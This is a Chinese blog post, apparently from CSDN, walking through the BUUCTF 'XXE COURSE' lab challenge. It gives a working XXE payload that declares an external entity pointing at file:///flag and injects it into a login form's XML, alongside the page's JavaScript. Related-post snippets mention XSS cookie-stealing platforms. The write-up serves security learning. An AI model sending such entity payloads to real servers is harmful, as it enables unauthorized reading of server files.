BUU XXE COURSE

最新推荐文章于 2024-04-13 13:10:20 发布
最新推荐文章于 2024-04-13 13:10:20 发布
阅读量2.9k 收藏 8
点赞数 5
分类专栏: buuctf 文章标签: redis database xml
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62879498/article/details/123750846
版权

BUU XXE COURSE

我们发现输入得用户名以 弹窗(alert) 的形式输出
在这里插入图片描述

同时 F12 进行前端查看 发现 在提交按钮处有

<button id="go" onclick="XMLFunction()">GO!</button>

说明我们的 数据传输方式为 xml
当然,我们也可以直接 在burp suite 进行抓包查看
在这里插入图片描述

我们看到了 xml 文档声明:

<?xml version="1.0" encoding="UTF-8"?>

所以,可能存在 xxe 漏洞

我们构造payload:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root[
<!ENTITY admin SYSTEM "file:///flag">
]>
<root>
<username>&admin;</username>
<password>2333</password>
</root>

实体是用于定义引用普通文本或特殊字符的快捷方式的变量,实体引用是对实体的引用。实体可在内部或外部进行声明。
因此,在这里我们利用 这一特性 我们在向服务器上传的文档中 使用外部实体 (通过引用定义在外部的 DTD 中的实体,我们称之为外部实体) 来访问我们 的 flag
有人可能会问 flag 也不会是 dtd 文件啊
我们在使用外部实体访问的时候,会对我们访问的文件进行检查是否为 dtd 文件,此时如果没有检测的话,就可以引用非dtd文件
造成漏洞,这就是xxe

所以到了这个时候,我们也就能够明白我们上面构造的payload的含义了:

<username>&admin;</username>    <!--使用admin实体-->
<!DOCTYPE root[
<!ENTITY admin SYSTEM "file:///flag">
]>                        <!--声明admin实体-->

在这里 usename 和 password 都存在 xxe 漏洞,所以两者之间 都可以进行 xxe 注入

点击 go 发现 flag

在这里插入图片描述

当然在这里我们也可以 使用 postman (本质是一样的,都是传递参数 将我们的payload传递到后台 php)

我们查看源代码,发现是 post 传参

<script type="text/javascript">
        function XMLFunction(){
            var xml = '' +
                '<?xml version="1.0" encoding="UTF-8"?>' +
            '<root>' +
            ' <username>' + $('#username').val() + '</username>' +
            ' <password>' + $('#password').val() + '</password>' +
            ' </root>'; <!--转化数据格式   串行格式化数据-->
            var xmlhttp = new XMLHttpRequest();   <!--实例化XMLHttpRequest 对象-->
            xmlhttp.onreadystatechange = function () { <!--页面初始化-->
                if(xmlhttp.readyState == 4){ <!--实时跟踪异步响应状态,监听函数 readyState4 数据接收完毕  此时可以获取完整的响应数据-->
                    console.log(xmlhttp.readyState);
                    console.log(xmlhttp.responseText);  <!--接受数据-->
                    alert(xmlhttp.responseText);<!--弹窗 接受数据-->

                }
            }  
            xmlhttp.open("POST","login.php",true); <!---建立 post请求,要求异步响应   xhr.open("POST", url, false)-->
            xmlhttp.send(xml);  <!--发送请求-->
        };
    </script>

上面有两点值得我们注意:

  1. 是 post 传参
  2. 接受地址是 login.php

现在我们使用 postman 了

在这里插入图片描述

hcjtn
关注
  • 5
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
1ncrd#Study-Record#BUUCTF[第二章 web进阶]XSS闯关1.md
08-10
一些关于xss的payload
BUU 论坛的编辑器163Editor
09-21
BUU 论坛的编辑器DianUbb.rar
XXE学习(with BUU XXE COURSE1)
最新发布
I_ET5u5的博客
04-13 326
进行一个XXE的学
第四天——CTF常用基础知识点-大杂烩
NYG694的博客
07-12 186
XSS (Cross-Site Scripting) 攻击则利用网站对用户输入的信任,将恶意的脚本注入到页面中,使得其他用户在浏览该页面时执行这些恶意脚本。攻击者可以在用户的浏览器中执行任意的脚本代码,例如窃取用户的登录凭证、篡改页面内容或进行其他针对用户的攻击。因此,XXE攻击主要针对XML解析器和应用程序中的XML处理逻辑漏洞,而XSS攻击则专注于利用Web应用程序中对用户输入的不当处理。CSRF是借用户的权限完成攻击,攻击者并没有拿到用户的权限,而XSS是直接盗取到了用户的权限,然后实施破坏。
BUUCTF Basic BUU BURP COURSE 1解题WP
风儿轻轻吹
03-27 1894
1.启动靶机 访问靶机发现网页提示只能本机访问: 可能是检查请求头只的X-Real-IP字段。 2.使用BP测试 BP抓包,添加X-Real-IP:127.0.0.1测试,发现返回登录界面且包含登录信息: 3.根据上述信息,更改使用POST方法提交username=admin&password=wwoj2wio2jw93ey43eiuwdjnewkndjlwe 获取flag{69a567b4-7864-47f6-b854-186ad981de40} ...
BUUCTF basic BUU XSS COURSE 1 & BUU XXE COURSE 1
网安小趴菜
09-03 5640
BUUCTF basic BUU XSS COURSE 1 & BUU XXE COURSE 1
XXE(xml外部实体注入漏洞)
qq_43294348的博客
01-15 942
BUU XXE COURSE 1 1漏洞破解
BUU XXE COURSE 1 【basic】
weixin_52942048的博客
10-07 292
看到username取到了admin变量的内容。发现请求参数是xml格式。
【网络安全CTF】BUUCTF(Basic篇)
信安是不可或缺的一部分!
05-11 5862
参考之前写的:https://blog.csdn.net/qq_39583774/article/details/120722112?此题详解可以看:https://blog.csdn.net/weixin_43965597/article/details/126381171。admin 加密码登陆注意这里不是md5加密,开始看错了,解半天没解出发现是明文存储的,无语。使用其他方式,发现这里不对,上传一个phpinfo发现能够执行,但是执行的jpg格式。
BUUCTF/BUU XXE COURSE 1
weixin_44041994的博客
03-22 753
xxe全称是"xml external entity injection",意为xml外部实体注入。服务端接收和解析来自用户端的xml数据,而没有做严格的安全控制,从而导致xml外部实体注入。原理是攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行。通过brup suite抓包发现,数据包上传的是xml数据。随意输入数据并登录,发现弹窗。打开页面发现是一个登录页面。所以可能存在xxe漏洞。输入flag,闯关成功。
Majin Buu Top HD Anime New Tabs Theme-crx插件
03-15
每次打开一个新选项卡,您将获得Majin Buu提供的不同高清壁纸 这个新主题包括时钟等等。 魔鬼的布欧(the devil,Buu),日本动漫《七龙珠》中的义与恶的角色,是《七龙珠》综合实力最强的BOSS。 这个名字来自电影...
POSN:POSN-BUU的源代码
04-01
POSN POSN-BUU的源代码
The HMT effects on the nucleon collective flows in BUU transport model
03-14
基于BUU模型利用集体流研究HMT效应,张芳,,基于半经典的BUU输运模型,我们利用中-质微分流、中子-质子流之差以及质子椭圆流研究了核内核子动量分布的高动量尾巴(HMT)效应。研
BUU XSS COURSE 1 wp XSS平台在线注册
SCP000111的博客
04-11 1200
具体原理就是相当于我们将我们的木马放到这个网站上了,当别人访问这个网站,我们的木马就会窃取他的cookie等相关信息。那么我们应该如何搭建自己的"木马服务器"呢,这里其实网上都有教程,不过需要内网穿透,而我们老白嫖怪了,网上有个免费的在线xss测试平台,这里把链接放出来。这里就提到一个重点了,自己的XSS平台,这个东西兄弟们可以理解为一个远程木马服务器,如果有访问,我们的服务器上就会获取他的信息。则判断存在注入点,XSS注入攻击是一个很大的类,这里我仅从这题出手,这题目是存储型XSS,相关知识自行搜索。
BUUCTF Basic 解题记录--BUU XXE COURSE
weixin_43171033的博客
10-08 548
2、了解了XXE漏洞,用burpsuite获取到的url转发给repeater,修改XML的信息,引入外部实体漏洞,修改发送内容,即可查看到flag信息。定义admin的外部实体,里面的命令是查看flag的信息。
[网络安全自学篇] 2021年安全学习规划
D.T.69的博客
01-20 4502
在对2021年进行规划之前,先对2020年安全学习规划做一个总结。整体来说漏洞扫描等简单安全工作已经比较熟练,网络安全等技术术语也有一定涉及;虽然日常与运维和网络沟通较少,但日常沟通相比于2019有所提升。同时2020年也出现一个小插曲,7月一直教我技术的同事离职对我今年安全学习规划来说来说是一个不小的打击。 2021年的计划是多练习渗透测试,熟练渗透手法,多开发(python等)。在练习的过程中碰到问题再通过百度等解决,同时根据问题以点带面进行安全技术学习。欢迎各位大神提建议。谢谢。 推荐一个很.
buuctf [PHP]XXE
qq_1873822的博客
03-14 3456
原理介绍 XML 被设计为传输和存储数据,其焦点是数据的内容。 HTML 被设计用来显示数据,其焦点是数据的外观。 HTML 旨在显示信息,而 XML 旨在传输信息。XML特点,XML 被设计用来结构化、存储以及传输信息。仅仅是纯文本,有能力处理纯文本的软件都可以处理 XMLXML 允许创作者定义自己的标签和自己的文档结构。XML 是独立于软件和硬件的信息传输工具。所有现代浏览器都有读取和操作 XML 的内建 XML 解析器,但是不同的浏览器解析的方法不一样的,如在IE中使用loadXML()方法,在其他
BUU XSS COURSE 1
09-12
BUU XSS COURSE 1是一个关于跨站脚本攻击(XSS)的课程。在这个课程中,学习者将学习如何识别和利用网站中的XSS漏洞。引用中提到了一个payload,它包含了一个iframe标签和一段srcdoc代码,这个payload可以用于触发XSS漏洞。引用提供了一个简单的XSS代码示例,它使用了<script>标签来弹出一个警报框。引用中提到了一个XSS平台,通过利用管理员的cookie和来访地址,可以访问指定的URL地址。 总结起来,BUU XSS COURSE 1是一个教授XSS攻击技术的课程,通过学习课程内容,学习者可以了解如何识别和利用网站中的XSS漏洞,并且还提供了一些XSS代码示例和相关工具来帮助学习者进行实践。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值